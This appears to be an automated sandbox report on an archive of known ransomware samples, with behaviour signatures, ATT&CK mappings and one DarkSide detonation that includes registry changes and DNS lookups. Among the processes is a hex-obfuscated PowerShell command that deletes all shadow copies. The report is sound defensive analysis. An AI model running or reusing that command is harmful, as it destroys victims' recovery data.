Analysis Overview

score

10^/10

SHA256

c5741701b3866459dd1ffa2477cfd8776713612912693a5897f78aac795d23e9

Threat Level: Known bad

The file RS.7z was found to be: Known bad.

Malicious Activity Summary

darkside credential_access discovery execution ransomware spyware stealer upx dearcry persistence hive defense_evasion impact lockbit evasion blackmatter babuk hades cryptone packer avoslocker conti avaddon trojan pyinstaller 512478c08dada2af19e49808fbda5b0b $2a$10$kmb3nsvqxc.93gyncgky/uq9hyhivf0e3hcajfiifr8hf3fmnofgm 7258 $2a$10$dfjplrxudytff.kmytq1rogsxjtjee8emqt65ftxltpjtxpzrhsaq 7178 medusalocker mespinoza sodinokibi makop

Blackmatter family

Mespinoza family

Makop

Hades payload

UAC bypass

DarkSide

DearCry

Babuk Locker

Detects Go variant of Hive Ransomware

Hades Ransomware

BlackMatter Ransomware

MedusaLocker payload

Avoslocker Ransomware

Medusalocker family

Lockbit

Avaddon

Sodinokibi family

Hive

Conti Ransomware

Renames multiple (3370) files with added filename extension

Deletes shadow copies

Renames multiple (260) files with added filename extension

Renames multiple (279) files with added filename extension

Renames multiple (478) files with added filename extension

Renames multiple (127) files with added filename extension

Modifies boot configuration data using bcdedit

Renames multiple (143) files with added filename extension

Renames multiple (1641) files with added filename extension

Renames multiple (8323) files with added filename extension

Renames multiple (81) files with added filename extension

CryptOne packer

Renames multiple (8072) files with added filename extension

Renames multiple (182) files with added filename extension

Renames multiple (163) files with added filename extension

Renames multiple (151) files with added filename extension

Renames multiple (7396) files with added filename extension

Renames multiple (7374) files with added filename extension

Renames multiple (144) files with added filename extension

Renames multiple (169) files with added filename extension

Renames multiple (167) files with added filename extension

Renames multiple (171) files with added filename extension

Renames multiple (154) files with added filename extension

Renames multiple (9354) files with added filename extension

Credentials from Password Stores: Credentials from Web Browsers

Renames multiple (60) files with added filename extension

Renames multiple (152) files with added filename extension

Renames multiple (3442) files with added filename extension

Renames multiple (190) files with added filename extension

Deletes backup catalog

Boot or Logon Autostart Execution: Active Setup

Drops file in Drivers directory

Loads dropped DLL

Drops startup file

Checks computer location settings

Deletes itself

Boot or Logon Autostart Execution: Print Processors

Executes dropped EXE

Credentials from Password Stores: Windows Credential Manager

Reads user/profile data of web browsers

UPX packed file

Looks up external IP address via web service

Command and Scripting Interpreter: PowerShell

Drops desktop.ini file(s)

Checks whether UAC is enabled

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Sets desktop wallpaper using registry

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Program crash

Enumerates physical storage devices

Detects Pyinstaller

System Network Configuration Discovery: Internet Connection Discovery

Browser Information Discovery

System Location Discovery: System Language Discovery

NSIS installer

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Modifies registry class

Checks SCSI registry key(s)

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Uses Volume Shadow Copy service COM API

Runs ping.exe

Modifies Control Panel

Suspicious behavior: EnumeratesProcesses

Views/modifies file attributes

Modifies Internet Explorer settings

System policy modification

Interacts with shadow copies

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

MITRE ATT&CK Matrix V13

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Windows Management Instrumentation

T1047

Persistence

TA0003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

Hidden Files and Directories

T1564.001

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

TA0006

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

Browser Information Discovery

T1217

System Location Discovery

T1614

System Language Discovery

T1614.001

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Remote System Discovery

Data from Local System

Inhibit System Recovery

Analysis: static1

Detonation Overview

Reported

2024-07-28 16:39

Signatures

Blackmatter family

blackmatter

MedusaLocker payload

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A

Medusalocker family

medusalocker

Mespinoza family

mespinoza

Sodinokibi family

sodinokibi

CryptOne packer

cryptone packer

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

UPX packed file

upx

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Detects Pyinstaller

pyinstaller

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A

Unsigned PE

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

NSIS installer

installer

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

132s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

Signatures

DarkSide

ransomware darkside

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (151) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Command and Scripting Interpreter: PowerShell

execution

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Sets desktop wallpaper using registry

ransomware

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\72c99bf6.BMP"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\72c99bf6.BMP"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A

Modifies Control Panel

evasion

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\Desktop\WallpaperStyle = "10"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A

Modifies registry class

Description	Indicator	Process	Target
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.72c99bf6	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.72c99bf6\ = "72c99bf6"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\72c99bf6\DefaultIcon	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\72c99bf6	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\72c99bf6\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\72c99bf6.ico"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeIncreaseQuotaPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: 33	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: 34	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: 35	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: 36	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 4904 wrote to memory of 1232	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4904 wrote to memory of 1232	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	217.106.137.52.in-addr.arpa	udp
US	8.8.8.8:53	240.221.184.93.in-addr.arpa	udp
US	8.8.8.8:53	g.bing.com	udp
US	204.79.197.237:443	g.bing.com	tcp
US	8.8.8.8:53	237.197.79.204.in-addr.arpa	udp
US	8.8.8.8:53	134.32.126.40.in-addr.arpa	udp
US	8.8.8.8:53	catsdegree.com	udp
US	8.8.8.8:53	57.169.31.20.in-addr.arpa	udp
US	13.248.169.48:443	catsdegree.com	tcp
US	8.8.8.8:53	temisleyes.com	udp
HK	154.219.131.251:443	temisleyes.com	tcp
US	8.8.8.8:53	48.169.248.13.in-addr.arpa	udp
US	8.8.8.8:53	22.249.124.192.in-addr.arpa	udp
US	8.8.8.8:53	133.211.185.52.in-addr.arpa	udp
US	8.8.8.8:53	228.249.119.40.in-addr.arpa	udp
US	8.8.8.8:53	1.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	26.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	48.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	53.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	51.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	41.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	40.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	22.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	30.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	20.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	30.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	22.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	51.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	48.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	53.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	40.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	20.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	41.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	26.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	10.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	21.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	25.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	42.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	44.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	45.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	23.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	47.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	50.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	58.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	62.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	8.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	14.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	63.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	66.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	10.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	42.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	23.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	50.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	58.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	45.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	47.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	44.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	21.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	62.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	25.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	14.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	8.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	66.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	63.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	57.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	56.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	61.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	55.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	36.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	43.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	35.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	34.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	33.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	31.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	29.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	46.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	24.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	18.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	16.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	17.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	15.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	9.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	32.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	7.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	2.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	3.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	6.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	0.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	4.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	88.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	86.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	85.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	77.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	78.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	76.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	70.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	74.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	71.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	69.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	67.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	68.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	64.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	84.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	82.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	26.165.165.52.in-addr.arpa	udp
US	8.8.8.8:53	56.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	57.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	61.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	55.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	33.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	36.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	29.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	16.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	9.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	32.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	31.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	3.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	35.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	6.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	4.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	7.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	15.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	24.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	17.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	46.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	18.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	82.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	0.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	43.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	34.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	59.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	60.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	54.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	49.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	39.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	28.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	5.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	12.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	13.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	11.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	27.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	38.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	19.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	37.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	65.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	73.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	72.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	79.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	75.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	83.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	80.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	87.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	89.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	81.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	90.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	70.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	67.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	84.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	69.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	68.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	76.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	74.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	77.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	88.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	86.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	71.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	78.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	64.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	56.126.166.20.in-addr.arpa	udp
US	8.8.8.8:53	85.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	49.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	60.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	54.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	13.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	28.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	39.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	11.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	19.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	5.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	37.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	27.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	59.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	38.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	65.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	12.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	73.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	79.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	72.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	80.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	83.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	87.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	81.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	90.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	75.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	192.142.123.92.in-addr.arpa	udp
US	8.8.8.8:53	191.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	189.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	183.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	153.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	145.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	139.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	167.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	191.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	189.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	183.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	139.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	153.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	167.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	145.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	129.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	254.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	131.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	133.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	130.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	134.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	135.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	137.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	136.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	138.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	140.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	142.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	141.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	143.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	144.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	147.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	148.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	149.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	150.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	151.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	146.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	154.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	155.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	152.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	157.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	156.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	159.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	158.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	161.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	160.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	162.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	163.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	164.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	165.0.127.10.in-addr.arpa	udp
